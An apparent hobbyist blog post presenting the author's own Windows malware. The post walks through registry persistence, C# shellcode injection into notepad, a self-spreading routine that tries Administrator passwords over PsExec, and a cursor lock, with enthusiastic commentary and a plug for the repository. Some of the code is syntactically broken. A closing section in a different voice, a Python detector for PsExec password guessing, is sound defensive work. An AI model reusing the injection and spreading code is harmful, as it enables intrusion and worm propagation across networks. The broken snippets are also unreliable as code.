
finishing up some malware!!!

posted on : 7/13/2024

hello everyone, today i bring you. finished malware. i love malware!!! anyways it can be found here. do go visit, give me a star, repost, reblog!!! idk. anyways let's get into what it does!

here are the steps in the program!!

step 1: it writes itself to the registry to run on boot

step 2: it will open notepad as a process and then inject shellcode to spawn a messagebox

step 3: it attempts to spread itself to other machines!!

step 4: finally, it will lock the cursor in place and prevent users from moving it around.

some code analysis!

some of my more proud parts are this:

    
        static bool UnsfInj(IntPtr h)
    {
        IntPtr memAlloc = VirtualAllocEx(h, IntPtr.Zero, Buf.Length, 0x00001000, 0x40);

        UIntPtr outout;
        WriteProcessMemory(h, memAlloc , Buf, (uint)(Buf.Length), out outout);		
        

        if (CreateRemoteThread(h, IntPtr.Zero, 0, memAlloc , IntPtr.Zero, 0,IntPtr.Zero) != IntPtr.Zero)
        {
            Console.Write("injection complete!");
            return true;
        }
        else
        {
            Console.Write("injection failed");
            return false;
        }

    }
}
    

this function injects shellcode which i think is just amazing....i love shellcode make some noise!!

here's how i locked the cursor. it's shrimple.


    while (1==1)
        {
            Console.SetCursorPosition(0,0 );
            if (Console.ReadKey().Key != ConsoleKey.K && Console.ReadKey().Key != ConsoleKey.Enter)
            {
                break;
            }
            
        }

the break is in there for testing purposes. i am still testing this mofo. trying to get an environment where i can bc my virtual machines hate me.

okay next is some misc pieces that i loved


     private static async Task (carat) bool Spread(List string  adrs, IEnumerable string pwl, string path)
    {
        using (TcpClient tcl = new TcpClient ())
        {
            for (int i = 0; i = adrs.Count; i++)
            {
                try
                {
                    byte[] bytes = Encoding.ASCII.GetBytes(adrs[i]);
                    IPAddress nadr = new IPAddress(bytes);
                    IPEndPoint edp = new IPEndPoint(nadr, 135);
                    await tcl.ConnectAsync(edp);
                  
                    
                    
                    foreach (string line in pwl)
                    {
                        string arguments = $@"\\{adrs[i]} -u Administrator -p {line}  -c -csrc ""{path} gigas.exe";
                        ProcessStartInfo psi = new ProcessStartInfo
                        {
                        
                            FileName = "C:\\Windows\\System32\\PsExec.exe",
                            WindowStyle = ProcessWindowStyle.Hidden,
                            CreateNoWindow = true
                        
                        };

                        
                        using (Process proc = Process.Start(psi))
                        {
                        
                            proc.WaitForExit();

                        }

                        
                    }
                    return true;
                   

                }
                catch
                {
                    return false;
                }
                    
            }
            
        }

i hearted this part!! it spawns psexec :3 anyways that's all for now goodbye. tune in later when i recode this into rust or go (vote in the cmts belowwww)
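From the defender's side, the PsExec loop above stands out in process-creation telemetry: one parent launches PsExec over and over against the same host and account, with a different `-p` value each time. The following is an added example, not code from this post or its repository. It flags that pattern in constructed records shaped like Sysmon Event ID 1 fields; the record layout, paths, hosts, password placeholders and thresholds are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records (time, parent image, image, command line),
# shaped like Sysmon Event ID 1 fields. Paths, hosts and passwords are made up.
PSEXEC = r"C:\Windows\System32\PsExec.exe"
DROPPER = r"C:\Users\demo\gigas.exe"
EVENTS = [
    ("2024-07-13T10:00:01", DROPPER, PSEXEC, r"PsExec.exe \\10.0.0.5 -u Administrator -p guess1 -c -csrc C:\tmp gigas.exe"),
    ("2024-07-13T10:00:03", DROPPER, PSEXEC, r"PsExec.exe \\10.0.0.5 -u Administrator -p guess2 -c -csrc C:\tmp gigas.exe"),
    ("2024-07-13T10:00:06", DROPPER, PSEXEC, r"PsExec.exe \\10.0.0.5 -u Administrator -p guess3 -c -csrc C:\tmp gigas.exe"),
    ("2024-07-13T11:30:00", r"C:\Windows\System32\cmd.exe", PSEXEC, r"PsExec.exe \\10.0.0.9 -u svc_admin -p onlyone ipconfig"),
    ("2024-07-13T11:31:00", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

# Pull the \\host target and the -u / -p values out of a PsExec command line.
ARGS = re.compile(r"\\\\(?P<host>\S+).*?-u\s+(?P<user>\S+).*?-p\s+(?P<pw>\S+)", re.I)

def psexec_spray_alerts(events, min_passwords=3, window=timedelta(minutes=5)):
    """Return (parent, host, user, distinct_password_count) for every parent that
    runs PsExec against one host/account with many different -p values in `window`."""
    attempts = defaultdict(list)
    for ts, parent, image, cmd in events:
        if image.lower().rsplit("\\", 1)[-1] not in ("psexec.exe", "psexec64.exe"):
            continue
        m = ARGS.search(cmd)
        if m:
            key = (parent.lower(), m["host"], m["user"].lower())
            attempts[key].append((datetime.fromisoformat(ts), m["pw"]))
    alerts = []
    for (parent, host, user), tries in attempts.items():
        tries.sort()
        for i, (start, _) in enumerate(tries):
            # Distinct passwords tried within `window` of this attempt.
            seen = {pw for t, pw in tries[i:] if t - start <= window}
            if len(seen) >= min_passwords:
                alerts.append((parent, host, user, len(seen)))  # count only, never the values
                break
    return alerts

if __name__ == "__main__":
    for alert in psexec_spray_alerts(EVENTS):
        print("possible PsExec password guessing:", alert)
```

The image-name check misses a renamed PsExec binary; matching on the OriginalFileName field that Sysmon records is more robust.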